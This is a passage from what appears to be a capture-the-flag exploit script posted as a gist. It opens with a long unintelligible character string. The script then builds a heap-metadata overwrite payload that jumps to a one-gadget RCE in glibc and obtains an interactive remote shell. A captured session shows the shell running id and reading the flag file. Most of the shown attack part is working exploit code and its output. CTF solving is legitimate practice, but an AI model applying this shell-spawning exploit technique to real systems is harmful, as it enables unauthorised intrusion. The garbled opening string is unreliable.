G2sS7srHZQPIZVso06c5IE1FYK1hpCM3dJojJwgQbEL1KITWs1F1CWH4N0TAFgTTjKimmKdX9QQZpOVfSWNvwGx2lCYX11ZFCoUv1ERdZ1LwRSyxgBoDmPeirkTHKD9xKUyvfwtzcOnU1GQbXDwNEbJ0BtPOlhBZQiCi2tTByZESAMZKhvro57scYQSS9nJd1QN0X8xMjkFlXQCQPHA19tZlhqUL59SPrJT9VOkxhxDdipw3molDLQS4Sym0IBBeEL2TpMMF2gtSouofC9nwsuHRNBLFj9C4wjLKPz2Y4qzb2nXaugZseV6OMSyCUpHhzwLdTCNcrYhZ6l7RXyuJspmbQaJm55uEKnu0Uk9UlsqOPhnQkxpVlAq3zB8MShF2M4zlTwBDs7MQuNKsZQ91BtX755U01Sr3Aboo6jKkSJvQQ0zTI1LMAX7FC6TRhi2clFQDly4EcPEvHANTOqkEnRJPF4AiW091M4za1wy9hu78YUTv2wZwwMGVTYGTNFdMPU4MjWePLCHXo0mOUIyRpNT5Wvwh3I1Gs9Zajiw6SweOsdsnrWjYbFLWSbT6LLm9Y4cgU61Cknfu0muQiKRIrVC2Kd6PW2mkSxaLxbtGjATMk1gCnWeoHlz89FDHaFR9YkDaCVdWhoneSixlbUL1DicsCinnKAaEVqHLYSRYHu1exVsqGTw2cPgc4CQzCujejsjekabx2OIKWebyWPvBUeCxDaHHyvOb0FqpNHrpofBD9e2tR9jhplAYbjalgVvl6pHCFPj7YO7FbzBSFFrWKZ7jRRos41IVClWh4iKlOIIh7fWzA80r9f10pF07k1pv8ao7BdQu7PScs4HK' | |
| ogrce = libc_base + 0xd6e77 # a One Gadget RCE in the remote glibc. | |
| payload = ''.join(( | |
| p(1), | |
| p(0x8), | |
| '#'*8, | |
| p(ogrce), | |
| )) | |
| client.add_message(2031, payload) | |
| # get a shell. | |
| client.writeln(str(2)) | |
| client.writeln(str(0xf00l)) | |
| client.interact() | |
| ''' | |
| ./attack.py ${REMOTE_ADDRESS} 6666 | |
| (snip) | |
| id | |
| uid=1001(diethard) gid=1001(diethard) groups=1001(diethard) | |
| ls /home/diethard/flag | |
| /home/diethard/flag | |
| cat /home/diethard/flag | |
| flag{W33_g0t_H34p_me7ad4t4_!n_BSS} | |
| exit | |
| *** Connection closed by remote host *** | |
| ''' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment